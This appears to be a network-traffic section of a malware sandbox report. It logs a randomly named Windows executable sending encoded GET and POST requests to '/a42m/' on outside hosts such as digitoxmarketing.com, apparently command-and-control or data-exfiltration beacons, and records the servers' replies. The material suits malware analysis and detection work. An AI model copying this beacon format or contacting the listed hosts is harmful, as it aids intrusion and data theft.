34 6e 54 71 69 6e 2f 45 32 65 73 41 75 68 51 31 39 78 69 6c 37 5a 61 61 57 64 36 67 6f 68 55 6c 45 33 73 70 6e 68 69 75 62 78 73 76 67 58 75 6a 72 4d 75 6a 52 75 69 50 [TRUNCATED]
                          Data Ascii: vH5=iS4ohAZhyodJKXRpjbqC42ZtFQyOvULYsozlcxsuQarOy0Hm6FbKYYBARqGNmNJkV5iM82/5oAOpNKEfscL5LNTLcIH0qWG53h/wE8/uhj+1YusapGrdv5RaHt/JAlHnW+kXZE16xbDOGI2FjX2cNz/WUzU+51jGoQei9UkS/nABNGi5nEUs5dXmCtlwVORN+U/oqdO5mBtqio5N4s9n33IiFajOE7kUkKGbklpR/+6UnuSLDIouSe6/AZ+eXdu3Qvva5XsOHc55flRkjOS/y44nTqin/E2esAuhQ19xil7ZaaWd6gohUlE3spnhiubxsvgXujrMujRuiP9aSPC/PxjGKXjqkybso9/aSSf5RHaPDAncgvhSe8awAlo2NXZfveduK9cNU6nGEGCGNSFlTVfehJiAVuHNSwWNuePAJlUgpMxgUFIzkk/J0WycYGs5mfOBT8VvrbWR5Yxz2rD0fFSvkwNX3bKqv5/kWkiqPapcFnFNpyjegVrC9AMHAvMRT5XCdo+APpahzHMld/C+ptMkyuLDJijvW9fa0+KDikUVeh4eCboK3zkfK3m8YH6gJq0dn5FIGEIvUT43r5+fgdcceHDtchOl3bqKQ8EHIl1xpwivJ5zWH4n6EX/IeKgqecU110vmryD2qHAlT6f709ZT9HjyoemIhhgVtCue1HQhFi75MrZ6+Dr9xIV4QXPRxcGaMc9gEZCSkwwxQ9BLdDIQDE1LSF6oL/htx8/vOBdETfjOYu9oczrXkHB/tYytDz7eXR4a8ZUP6m8i5TTPRe9eSGqPFbS3W/ZjW4pgMdfUtKV2wJCpdYGXaStAYTa4bA0TUOmQa5pUjAUzjasm6rBrgXn2Ai3+SqG8hyVjEMEunuxSecg1I9Lkz2H7qVHX0+BBeAoh0GNANpTJzvPQwX3aSoavI9/gOu4rwdlY2qhyjfVCWZC3b0pz1l21pdTue6ZwAmkYya5qMSAHb4+bnJ8OKBPtyNwXaixgbh17W7iPvEmz [TRUNCATED]


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.553677154.55.135.138807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:30.153161049 CEST486OUTGET /a42m/?vH5=vQQIiwhFgpVoGnhhtc2P1VILfyaWtEv7qbiLczs1d6+poiTW6QrgALxDe+CMs+NuEeSHyk/V30WhMaxjncGhKZCgCMKVtFum7SXMM5CUlA+qFcg/x36UpY0MC+LaLW6wHA==&R0nl4=f64p HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.p65cq675did.shop
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.553678104.194.9.31807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:56.850543022 CEST768OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.digitoxmarketing.com
                          Origin: http://www.digitoxmarketing.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.digitoxmarketing.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 63 36 49 55 68 38 77 31 78 4b 41 58 79 38 71 48 6c 69 68 63 4a 48 53 44 38 53 4e 64 37 6c 76 68 78 38 35 74 4c 79 31 6d 46 41 62 6b 36 65 32 50 30 64 61 4f 62 4c 79 4d 6a 63 47 37 45 68 75 75 47 31 56 53 6e 69 4d 4e 64 47 61 67 4d 4c 6f 43 71 32 76 4e 5a 31 57 46 39 33 42 37 43 75 6c 6c 35 66 46 4b 47 69 34 37 53 48 42 57 70 45 6d 58 66 75 70 41 77 4a 50 30 53 4d 53 69 56 64 6a 6f 71 66 78 4d 34 62 63 51 75 6b 2b 4f 37 35 79 71 48 6d 33 52 59 72 5a 55 4d 6b 36 53 38 77 65 2f 47 2b 61 6d 67 30 30 7a 2f 77 44 68 79 48 65 44 38 69 6e 31 73 61 62 36 2f 2b 34 33 7a 6a 66 67 59 4c 71 68 43 74 49 3d
                          Data Ascii: vH5=c6IUh8w1xKAXy8qHlihcJHSD8SNd7lvhx85tLy1mFAbk6e2P0daObLyMjcG7EhuuG1VSniMNdGagMLoCq2vNZ1WF93B7Cull5fFKGi47SHBWpEmXfupAwJP0SMSiVdjoqfxM4bcQuk+O75yqHm3RYrZUMk6S8we/G+amg00z/wDhyHeD8in1sab6/+43zjfgYLqhCtI=
                          May 23, 2024 15:18:57.768744946 CEST1236INHTTP/1.1 404 Not Found
                          Connection: close
                          x-powered-by: PHP/7.4.33
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          content-type: text/html; charset=UTF-8
                          set-cookie: pbid=63ca0da697d2750f9c5521ccdb3312356640a39c55160d7b7c02c575c995ccab; expires=Tue, 19-Nov-2024 13:18:57 GMT; Max-Age=15552000; path=/
                          link: <https://digitoxmarketing.com/wp-json/>; rel="https://api.w.org/"
                          transfer-encoding: chunked
                          content-encoding: br
                          vary: Accept-Encoding
                          date: Thu, 23 May 2024 13:18:57 GMT
                          server: LiteSpeed
                          Data Raw: 37 30 38 63 0d 0a f4 ff 1f 8a 0c ca 18 07 00 80 ef 3d 34 22 45 ed 87 5d 22 72 d2 ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 5f 02 83 63 02 ff 61 5a b6 e3 7a bc 3e bf ff fc bd da 7f 9b 99 7c fc 2b 67 a7 36 a4 42 80 ed c4 0e 2e 49 1f 69 ef e4 ce e6 b6 d3 34 f7 15 67 18 81 0e 58 09 48 54 12 c6 5e 2f ff 2f b3 aa b3 e3 72 fa ad 78 d1 19 ae 02 0c 48 68 73 d8 bd 64 f6 b6 66 56 f7 3e 7e 48 fa b2 a9 40 82 02 e4 25 3d 3e 1e e6 72 1d f3 f3 4d ad a9 a6 c2 a3 6b 0c 07 58 84 85 53 a5 d2 ea 5c 34 d4 3f 52 e9 18 4f a4 c3 7d bf 56 f5 dd f3 f3 e5 1c cc 9e 55 0f d3 7b 6f 41 45 05 94 12 d4 ae da 33 80 00 a2 4d 32 ed 20 53 5b 67 d6 af 2f b5 f2 3c 7b 39 fd e8 08 ca 67 4e be f4 7f 8d 6d ad 2c d6 b8 13 d6 80 45 b0 0b ea a2 09 82 5d ad 81 42 f7 bf d7 ea e5 ff 3b 26 80 8d 12 34 fd 31 33 1b 19 c5 84 aa 6e 5d f0 a4 27 a0 ee 1e a0 0e 40 1d 40 04 ea 00 62 dd aa 7b ef 7b 7a 92 7a d5 61 67 7b 62 dc dd e3 9e 14 7f 9e 75 48 19 1a 1a cf 8c c7 21 65 6a 02 34 e3 34 9f da c8 80 7d 33 63 ff 9f 99 96 e1 bd 47 ee 19 19 1b 1a 1f ae 22 5d [TRUNCATED]
                          Data Ascii: 708c=4"E]"rPH`?_caZz>|+g6B.Ii4gXHT^//rxHhsdfV>~H@%=>rMkXS\4?RO}VU{oAE3M2 S[g/<{9gNm,E]B;&413n]'@@b{{zzag{buH!ej44}3cG"]4n@JA~LP 2hi,MUuzjnkg(B)" Q2FzK}@UFYVY/_VM:0<c8)!*{<k<6{S,,Vg*KcL[f""99AEDAl7s,NbVwMo&cU4*I0WX|}PONVNV<qm7$Hvd<
                          May 23, 2024 15:18:57.769835949 CEST1236INData Raw: 49 36 e4 4e d6 d2 e9 03 91 ff 7a 0f dc bc a1 93 aa 1e a3 cc dd 23 74 9d 99 d1 85 76 76 76 b0 c3 8e 99 d2 6b e3 1f a7 44 e9 21 dd 16 ce 48 74 e3 7d b0 27 db bf 10 71 c7 0e b3 99 f8 fc a8 9b 5f 80 d9 4d a9 95 d5 0d b2 46 d7 fe ec 87 3c 60 f3 3f dd
                          Data Ascii: I6Nz#tvvvkD!Ht}'q_MF<`?G|3Dkd++<k&mWf?|;Qdw+uXVI&Q$J+gYu iF41|CaS)o*DGwe1"C."oU?|$#'('@
                          May 23, 2024 15:18:57.773802042 CEST1236INData Raw: 52 bf d5 9f 1b 5d f8 cf f8 42 4f ee d8 61 5a 07 ac 8f 01 e5 c0 98 a9 b4 f2 e5 f9 f6 7d 13 d0 93 e2 2d a6 30 74 bf d0 3a 4f c0 9a 4a 97 05 1f 5e bd d7 52 f8 9c 69 75 54 39 33 b4 15 18 9c 4a 5f 65 58 b8 ff 61 70 e6 d0 b4 52 71 87 7e 40 9d af 82 b1
                          Data Ascii: R]BOaZ}-0t:OJ^RiuT93J_eXapRq~@~*vA0cPr7G"8KsZg1S%Z@_ybI#:ppi`T?cvP)xZVp=^L:}|1l,H5:M
                          May 23, 2024 15:18:57.773817062 CEST1236INData Raw: 5e c2 ca 2c 9e 3a 47 8d c6 62 06 ca 9c 96 18 e5 c2 a8 ec 78 68 3b 39 76 e7 86 ab f9 41 3a 37 dc ee 94 5e 3c a5 6b f1 eb 4b 54 53 dd 94 5e 29 82 7a 0b cf fc 47 eb 2d dc 9f 1c fd 4d cf b4 b3 8b 89 27 7a 0c fa d6 c2 b3 ee ba ba cf 51 96 5e 4e 26 61
                          Data Ascii: ^,:Gbxh;9vA:7^<kKTS^)zG-M'zQ^N&a?H[xzgs68%dfD=F4QS9=Y3NI|p>alA=}+MoSUc:w_~'UN3;nj
                          May 23, 2024 15:18:57.781605959 CEST1236INData Raw: 1a 40 d6 a1 8f 84 64 23 f3 93 77 5c ec 22 a8 c6 77 b3 37 a1 c5 c0 2d 00 fa f1 1c 15 b5 04 e9 77 c4 7a 79 3c 39 60 55 5e c3 8a e5 5e 34 86 17 df ad e3 9e 02 89 a3 0d 32 23 14 47 47 64 36 0f d4 1c 99 45 c3 62 f2 cb 33 47 2e e0 90 1a 76 a1 49 a8 a5
                          Data Ascii: @d#w\"w7-wzy<9`U^^42#GGd6Eb3G.vI3fuO_[Oe&`FSPDOFeL.HHz/6Fq/C\lC[-6vIGcjYHz,:+bS$=X_Q1j,Thx
                          May 23, 2024 15:18:57.785770893 CEST1236INData Raw: cd 9b 9f 43 fe 48 23 91 4a 0f 6b 88 e3 92 fb ab 0f 1d e8 91 e5 16 0e 4e 3c 9a e8 3d 58 75 27 1d 52 97 90 0d 06 cd 72 56 c8 3a 6f 0d 2c ad 44 56 c9 76 fa 23 73 7e 8d b6 20 1f e2 d1 d5 84 4c 2a 9f 61 b3 44 0d 89 c6 00 e1 d8 22 c8 0a c1 94 74 b3 fa
                          Data Ascii: CH#JkN<=Xu'RrV:o,DVv#s~ L*aD"tl\Kl~5]^;6_ .Xs\zL:NJzk1@wb=y^"-,WIiU9f0:(lWweGz`XlDy@_mXV9F-J
                          May 23, 2024 15:18:57.785788059 CEST1236INData Raw: ef 00 50 91 de e2 11 c0 16 12 9e 7c 1c e4 85 87 c8 d2 18 28 64 87 9b 74 49 5b 4a 53 7a 2d b4 1e 79 a6 81 fb 4f c8 93 20 70 92 04 4e 39 81 53 41 e0 a4 08 9c ca b4 0c ee 0f 58 71 5e bb c2 88 d5 56 4c 65 28 50 bb 75 ff a4 4f 40 bf 5c 45 ed af 8f 93
                          Data Ascii: P|(dtI[JSz-yO pN9SAXq^VLe(PuO@\EkkT" F|e2"L-C`hd.JZ{CP6~n-F^StgdQk8rJ<-:_@]Y:w;LNnd
                          May 23, 2024 15:18:57.793374062 CEST1236INData Raw: d8 8a b7 d8 19 48 15 58 7d 30 55 dc 5a b6 e8 40 22 20 f6 37 b1 67 ca 74 df 6b 43 01 c6 31 85 77 1a 58 13 94 ce b5 ba cb 04 e7 d9 7f 13 96 00 ab 98 97 58 e9 2a d3 85 ed 06 2a 2b 41 56 7c c0 23 01 5d a5 06 9c ec e7 54 05 b9 8f 43 7b 9d 4a 13 07 94
                          Data Ascii: HX}0UZ@" 7gtkC1wXX**+AV|#]TC{J1Di45lg~1q2=p6s_^ D\Z\:kayg}-'EghsG|DG<3&LqJ8:yv<Z9I(flk#
                          May 23, 2024 15:18:57.793394089 CEST1236INData Raw: df 09 4c f8 67 76 1b 33 7c 92 1c 58 9d b1 e5 ba f7 43 65 f2 30 06 37 8d 2f d2 3c 19 50 aa 99 cd 07 46 20 61 d6 f0 2a 1d 12 d3 df eb ab 35 81 0f 2b fb ce 3d 28 6c 21 71 2c ce 32 b4 6e 8e 5d f0 6c d6 32 5d a0 09 4d e2 fa 70 72 5e ba 22 73 85 9b 53
                          Data Ascii: Lgv3|XCe07/<PF a*5+=(l!q,2n]l2]Mpr^"sSeCW&+'2Fk"EOWm^&s7*G%Q7psP_ZE]6Gc!#lvRj616Sx6nf,Z<#riLeI@@S]&JLG&M]icG
                          May 23, 2024 15:18:57.799573898 CEST1236INData Raw: 0a 5d ff fb fb c1 6b fc b7 c4 01 28 20 e3 c7 72 2f 2c a4 cf 90 2c e7 c9 f5 f5 fc fa 7a bd 5a 26 eb f5 02 5e 28 f4 d0 e6 9f d7 fb 3b 48 61 9d 5c 16 55 22 56 61 5c 56 f3 70 29 16 71 b8 16 ab eb 70 55 5c 27 e5 92 2f 97 97 7c 01 14 6a 40 35 48 4f 9b
                          Data Ascii: ]k( r/,,zZ&^(;Ha\U"Va\Vp)qpU\'/|j@5HOU.["|_Ha?0[4BuVtaX5aF0R\HQ w;n/S)7ql@!g|Gxgd]QuP <+wR:WHt\pCj#
                          May 23, 2024 15:18:57.799590111 CEST1236INData Raw: 2a 13 d1 6f 24 48 15 fb dd 63 8f ac eb ed ce d7 fb f6 c6 cd 99 27 2b ff bc 62 79 55 fc 0e fe 5b cf d4 46 01 c3 4f d2 88 90 b1 20 3b 8f 37 8a 49 43 b4 62 36 67 f1 6c 73 e6 d9 7c 71 d9 f3 cb c6 65 85 90 20 e7 62 b0 71 ec 4a 43 ce c9 ce e3 cd 99 27
                          Data Ascii: *o$Hc'+byU[FO ;7ICb6gls|qe bqJC'l76+d2="</32` %/)iyLzLPOQUZjgL*fzkQ2W+[m-wHq$rW9G+wiX6rVn|7eyu/(


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.553679104.194.9.31807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:59.452174902 CEST788OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.digitoxmarketing.com
                          Origin: http://www.digitoxmarketing.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.digitoxmarketing.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 63 36 49 55 68 38 77 31 78 4b 41 58 79 64 61 48 32 7a 68 63 50 6e 53 41 68 69 4e 64 69 56 75 6d 78 38 46 74 4c 32 73 35 46 79 50 6b 36 38 75 50 6d 4a 4f 4f 57 72 79 4d 6f 38 47 2b 5a 78 76 67 47 31 4a 61 6e 6d 4d 4e 64 46 6d 67 4d 50 67 43 70 45 48 4b 61 46 57 44 6c 48 42 35 4d 4f 6c 6c 35 66 46 4b 47 68 45 56 53 48 4a 57 70 33 2b 58 66 50 70 44 73 35 50 33 45 63 53 69 52 64 6a 73 71 66 78 69 34 66 64 4c 75 6d 32 4f 37 38 57 71 48 33 33 51 57 72 5a 53 49 6b 37 75 79 67 48 59 63 39 4b 76 72 48 70 79 76 41 33 76 2b 52 7a 70 6d 41 76 64 2f 36 33 43 76 74 77 41 69 54 2b 4a 43 6f 36 52 63 36 65 43 33 44 5a 30 37 35 42 68 4c 47 46 43 39 52 6b 63 2f 4d 65 62
                          Data Ascii: vH5=c6IUh8w1xKAXydaH2zhcPnSAhiNdiVumx8FtL2s5FyPk68uPmJOOWryMo8G+ZxvgG1JanmMNdFmgMPgCpEHKaFWDlHB5MOll5fFKGhEVSHJWp3+XfPpDs5P3EcSiRdjsqfxi4fdLum2O78WqH33QWrZSIk7uygHYc9KvrHpyvA3v+RzpmAvd/63CvtwAiT+JCo6Rc6eC3DZ075BhLGFC9Rkc/Meb
                          May 23, 2024 15:19:00.353271961 CEST1236INHTTP/1.1 404 Not Found
                          Connection: close
                          x-powered-by: PHP/7.4.33
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          content-type: text/html; charset=UTF-8
                          set-cookie: pbid=a7abf01be0dad0e110c65e58536e3ca658c8283c8d5bcb8df9add79ef8f791ea; expires=Tue, 19-Nov-2024 13:19:00 GMT; Max-Age=15552000; path=/
                          link: <https://digitoxmarketing.com/wp-json/>; rel="https://api.w.org/"
                          transfer-encoding: chunked
                          content-encoding: br
                          vary: Accept-Encoding
                          date: Thu, 23 May 2024 13:19:00 GMT
                          server: LiteSpeed
                          Data Raw: 37 30 38 65 0d 0a f4 ff 1f 8a 0c ca 18 07 00 80 ef 3d 34 22 45 ed 87 5d 22 72 d2 ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 5f 02 83 63 02 ff 61 5a b6 e3 7a bc 3e bf 2f 7f af f5 ff 6d aa f2 f1 af f4 a9 b5 21 23 c4 c3 4e ec e0 25 d9 47 66 4e e5 d4 e6 ce d4 64 72 5f 71 8a 12 a8 c1 4a 40 62 24 61 ec f5 f2 ff 32 ab 3a 3b 2e a7 df 8a 17 9d e1 2a c0 80 84 36 87 dd 4b 66 6f 6b 66 75 ef e3 87 a4 2f 9b 0a 24 28 40 5e d2 e3 e3 61 2e d7 31 3f df d4 9a 6a 2a 3c ba c6 70 80 45 58 38 55 2a ad ce 45 43 fd 23 95 8e f1 44 3a dc f7 6b 55 df 3d 3f 5f ce c1 ec 59 f5 30 bd f7 16 54 54 40 29 41 ed aa 3d 03 08 20 da 24 d3 0e 32 b5 75 66 fd fa 52 2b cf b3 97 d3 8f 8e a0 7c e6 e4 4b ff d7 d8 d6 ca 62 8d 3b 61 0d 58 04 bb a0 2e 9a 20 d8 d5 1a 28 74 ff 7b ad 5e fe bf 63 02 d8 28 41 d3 1f 33 b3 91 51 4c a8 ea d6 05 4f 7a 02 ea ee 01 ea 00 d4 01 44 a0 0e 20 d6 ad ba f7 be a7 27 a9 57 1d 76 b6 27 c6 dd 3d ee 49 f1 e7 59 87 94 a1 a1 f1 cc 78 1c 52 a6 26 40 33 4e f3 a9 8d 0c d8 37 33 f6 ff 99 69 19 de 7b e4 9e 91 b1 a1 f1 e1 2a [TRUNCATED]
                          Data Ascii: 708e=4"E]"rPH`?_caZz>/m!#N%GfNdr_qJ@b$a2:;.*6Kfokfu/$(@^a.1?j*<pEX8U*EC#D:kU=?_Y0TT@)A= $2ufR+|Kb;aX. (t{^c(A3QLOzD 'Wv'=IYxR&@3N73i{*IdMxw5!TUfxnv(;x&j.T2.%,!Ym Q;Ki([*mUhzxl|HX0cL) Z=c{hp1B)bl}!>k "MC+TDvC<;zak+fu1!0`2VO(3xw{W]lwlHk=7]gfoA#W.
                          May 23, 2024 15:19:00.353816032 CEST1236INData Raw: a4 49 b2 25 0f b2 91 4e 1f 89 fc d7 7b e2 e6 03 9d 54 cd 18 65 ee 1e a1 eb 2c 8c 2e b5 b3 8b 83 1d 76 2c 94 5e 1b ff 38 25 4a 0f e9 b6 70 41 a2 3b ef 57 7b b2 fd 0b 11 77 ea 31 5f 88 cf 8f ba f9 05 58 dc 55 5a 59 dd 22 6b 75 e3 2f be c9 23 b6 ff
                          Data Ascii: I%N{Te,.v,^8%JpA;W{w1_XUZY"ku/#,/|#rVlag-bo'g*}$Vk,knZ7m42/b6l&Q(".Sw*gY#pxtLlpxt6dy[UO{|Fj,Jn
                          May 23, 2024 15:19:00.355117083 CEST1236INData Raw: 35 26 f5 5b fd 47 ab 4b ff 15 df e8 d9 9d 7a cc ea 80 f5 29 a0 1c 18 33 95 56 be 3c df be 6f 02 7a 56 bc c3 0c c6 fe 07 5a e7 09 58 53 e9 b2 e0 c3 ab 0f 5a 0a 9f 33 ad 8e 2a 67 86 b6 02 83 73 e5 ab 1c 0b f7 3f 0c ce 1c 9a 4e 2a ee d0 0f a8 f3 55
                          Data Ascii: 5&[GKz)3V<ozVZXSZ3*gs?N*U0OWy[:>&srj[T{a9^<f|NDKs7X;a$[[.N %L*;rq/mK^}y<eh0\?1WN?=s|2dy927
                          May 23, 2024 15:19:00.356431007 CEST672INData Raw: 74 6c 2f 61 65 16 4f 9d a3 46 63 31 03 65 4e 4b 8c 72 61 54 76 3c b4 9d 1c bb 73 c3 d5 fc 20 9d 1b 6e 77 4a 2f 9e d2 b5 f8 f5 25 aa a9 6e 4a af 14 41 bd 85 67 fe a3 f5 16 ee 4f 8e fe a6 67 da d9 c5 c4 13 3d 06 7d 6b e1 59 77 5d dd e7 28 4b 2f 27
                          Data Ascii: tl/aeOFc1eNKraTv<s nwJ/%nJAgOg=}kYw](K/'^[-<U=O9ZxGoVe2["R]c[e#(wOs}$pQ8x]bH0\ &w_s)}t;/?Qj'gNv
                          May 23, 2024 15:19:00.356441021 CEST1236INData Raw: 68 b5 85 31 65 bf 80 8f f0 84 83 59 a6 16 24 5f 43 0d f9 a4 5b c8 4b 74 e9 35 e8 5b 5c 48 71 f8 76 d5 d1 b2 05 51 43 7d d1 a9 16 64 79 1a 8b 16 24 9d 2f ba bc 85 9c 77 24 85 24 2f 4e 20 5a 28 38 a3 69 7b 3f 5a 94 4a de 02 67 45 11 70 0a f6 f2 fc
                          Data Ascii: h1eY$_C[Kt5[\HqvQC}dy$/w$$/N Z(8i{?ZJgEp--Zx)B-H&o!gyyPUUmz0p}By+QqV<M%Y3p9R5,iKlN&r8"[xho3S/pn`jp
                          May 23, 2024 15:19:00.359010935 CEST1236INData Raw: 65 b9 fa b4 a2 16 fc 9f b0 ea 7a 05 a8 23 5c 95 35 e5 37 91 2b cb d3 11 2e 6a be fc 38 5e 5d 12 4b ce 77 da e2 b3 f8 59 36 72 cc 8b a6 d8 33 dc 5f 81 83 0c c1 37 f7 90 c9 78 a3 32 fa 19 4d 23 4c b3 4e 9e 39 ed cb bb 4e ae 33 16 df 3d 10 7c 0b 30
                          Data Ascii: ez#\57+.j8^]KwY6r3_7x2M#LN9N3=|0Oqf%hO;-htj!HbN,y'8&RA|9KvJtmOCWV<TZ*(6(WSZ:mQ@xi<N;AxKGD"
                          May 23, 2024 15:19:00.360310078 CEST1236INData Raw: 8b 71 23 c7 29 0a 8e 2b 5d 94 88 22 e2 c9 31 19 b7 17 fd 91 d9 a6 f8 b8 de e2 a3 40 c7 0e 61 64 55 a5 d0 33 96 f8 97 33 26 04 7f 81 4b 23 59 4c fb f5 c8 85 de 32 a7 ef 70 72 0d e7 45 74 06 11 70 7f 67 bc 1b 03 1e 62 70 17 1a f0 8c 21 fa 04 b4 4f
                          Data Ascii: q#)+]"1@adU33&K#YL2prEtpgbp!O0XH{>'OCY"qxpMVO~R{-7Uip9+f$c_RI/p4$UdpX&Qz=l,^`bo)3%HxM:of<Xts'8))H~d
                          May 23, 2024 15:19:00.360327959 CEST1236INData Raw: af d7 21 91 d5 1f 72 a2 6d 74 ec 4a e3 08 a8 a4 32 7d 05 ac 2e 58 b5 a6 f5 8e c6 35 30 5c 0e 46 60 32 49 5b 20 a7 c4 29 44 15 d8 f8 43 23 0e c0 d2 1c 87 a2 26 82 b3 d1 56 71 bb d8 e2 69 44 6b 63 18 8b 7d a2 2f da aa 7e 15 3d 1b bc e0 40 77 db 57
                          Data Ascii: !rmtJ2}.X50\F`2I[ )DC#&VqiDkc}/~=@wW_6'6l%ar0I^EQfw$%.Ra.Q1(Q)EM/QP(X|~>=z?)ZeG1:[<-]I@@]phi
                          May 23, 2024 15:19:00.360342026 CEST1236INData Raw: 27 33 53 81 67 d1 56 b7 c1 b9 74 a7 14 37 8c 01 5a b3 d4 98 1c 48 6f e0 20 d8 47 47 db d0 5d b2 dd 0f 34 20 dd 34 1f d4 0a 7b 9b 96 0a 4a 18 04 57 ac 68 9f c7 81 07 7d b9 d2 3c 47 68 24 90 8e 4a bf de fb f9 75 8b 0e e1 09 a6 09 af e4 6c e7 e6 1d
                          Data Ascii: '3SgVt7ZHo GG]4 4{JWh}<Gh$Jul$J*c!4hT6aZLd(q<h8$z$y6:[8&+/GQ<Of6[!8*n*~tn8hgBhi52Fm)&4BOA/&WLD2{QQ8Clph
                          May 23, 2024 15:19:00.362967968 CEST1236INData Raw: 6a ec 1b 5d 0f 05 2a ad 06 55 e4 5a 54 31 c4 c8 02 63 9b c4 f6 44 c9 03 9b 4b b6 33 92 cb 42 66 94 b8 f9 e4 cf 4c ff 33 06 02 ec 3d 11 31 0f 85 ea e8 af 18 3c 18 ee 7f 0b ed 5d c0 ef 15 7a 73 44 0a 10 b0 57 55 98 80 3d f6 db 68 8c e9 e6 84 d9 9c
                          Data Ascii: j]*UZT1cDK3BfL3=1<]zsDWU=h1F;np}dryO+g5CF-&h}>pb*w~9nXwl\_c_nXf#=P"x~4JL`H}'xJ
                          May 23, 2024 15:19:00.363583088 CEST1236INData Raw: 62 2f 3b a1 aa 66 32 30 2f 77 e7 3a c3 eb 5a 56 1b fa f6 f3 dd 6d 1e 5c f7 03 4d 67 81 36 79 14 ef c9 54 5e 4f 40 76 06 dc 60 22 34 a8 9a 2a 2c 3f 60 48 cb ae 58 af d8 e4 fc fe 84 f8 a1 ff e4 c6 7d 55 7f 8c dc 90 0a 2e 19 e6 c5 ff 37 6f 07 04 c4
                          Data Ascii: b/;f20/w:ZVm\Mg6yT^O@v`"4*,?`HX}U.7o* dp"vy*YK{fP9M2:|oj6sdZljL vjG-=&69g#T?ONc|+gAcLk{6K3


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.553680104.194.9.31807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:19:02.005714893 CEST1805OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.digitoxmarketing.com
                          Origin: http://www.digitoxmarketing.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.digitoxmarketing.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 63 36 49 55 68 38 77 31 78 4b 41 58 79 64 61 48 32 7a 68 63 50 6e 53 41 68 69 4e 64 69 56 75 6d 78 38 46 74 4c 32 73 35 46 79 58 6b 36 74 4f 50 30 2b 79 4f 58 72 79 4d 6c 63 47 2f 5a 78 75 38 47 31 42 65 6e 6e 78 77 64 41 71 67 44 4e 34 43 73 31 48 4b 4e 31 57 44 73 6e 42 34 43 75 6c 4b 35 62 67 44 47 69 38 56 53 48 4a 57 70 78 53 58 50 4f 70 44 75 35 50 30 53 4d 53 2b 56 64 6a 55 71 66 35 55 34 66 4a 62 75 53 43 4f 36 63 6d 71 46 46 50 51 65 72 5a 51 50 6b 37 32 79 67 37 48 63 39 57 4a 72 45 31 49 76 44 6e 76 38 58 71 75 78 77 36 4c 38 70 44 62 69 2f 51 73 2b 32 79 7a 4d 2b 43 4c 57 49 36 38 39 42 46 69 30 75 78 63 46 6e 38 47 69 31 63 53 2f 37 6e 7a 4c 38 55 39 53 6f 38 2b 35 2b 4f 69 70 77 6b 61 6a 48 77 4c 2f 73 76 78 31 69 51 79 62 4f 57 4d 6a 50 46 4e 4a 4d 51 4a 41 58 45 45 57 6b 2b 4e 35 5a 55 72 5a 50 75 47 57 67 67 68 4e 33 34 36 52 4c 77 65 39 37 67 63 46 37 46 42 47 53 61 48 36 38 61 6f 64 2f 6f 68 4b 50 5a 75 32 45 59 43 6d 55 68 6c 2f 53 4d 32 65 39 6a 67 4e 52 6f 5a 68 49 [TRUNCATED]
